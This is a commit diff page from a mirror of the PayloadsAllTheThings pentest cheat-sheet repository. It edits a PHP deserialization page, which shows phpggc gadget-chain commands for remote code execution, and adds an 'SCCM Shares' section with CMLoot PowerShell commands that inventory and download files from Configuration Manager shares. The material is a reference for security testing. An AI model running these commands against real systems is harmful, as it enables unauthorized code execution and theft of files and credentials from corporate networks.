mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
SCCM Shares
This commit is contained in:
parent
183876f660
commit
d67ec2469c
@ -14,8 +14,9 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c
|
||||
|
||||
* [General concept](#general-concept)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [Object Injection](#object-injection)
|
||||
* [Finding and using gadgets](#finding-and-using-gadgets)
|
||||
* [PHP Phar Deserialization](#php-phar-deserialization)
|
||||
* [Phar Deserialization](#phar-deserialization)
|
||||
* [Real world examples](#real-world-examples)
|
||||
* [References](#references)
|
||||
|
||||
@ -82,7 +83,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
|
||||
|
||||
Because `true == "str"` is true.
|
||||
|
||||
### Object reference
|
||||
## Object Injection
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
@ -145,7 +146,7 @@ phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
|
||||
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
|
||||
```
|
||||
|
||||
## PHP Phar Deserialization
|
||||
## Phar Deserialization
|
||||
|
||||
Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`.
|
||||
|
||||
@ -237,3 +238,4 @@ A valid PHAR includes four elements:
|
||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
|
||||
* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)
|
@ -120,6 +120,7 @@
|
||||
- [PrivExchange attack](#privexchange-attack)
|
||||
- [SCCM Deployment](#sccm-deployment)
|
||||
- [SCCM Network Access Accounts](#sccm-network-access-accounts)
|
||||
- [SCCM Shares](#sccm-shares)
|
||||
- [WSUS Deployment](#wsus-deployment)
|
||||
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
|
||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
@ -3742,6 +3743,17 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||
ConvertFrom-SddlString ""
|
||||
```
|
||||
|
||||
### SCCM Shares
|
||||
|
||||
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
|
||||
|
||||
* [1njected/CMLoot](https://github.com/1njected/CMLoot)
|
||||
```ps1
|
||||
Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
|
||||
Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
|
||||
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
|
||||
```
|
||||
|
||||
|
||||
### WSUS Deployment
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user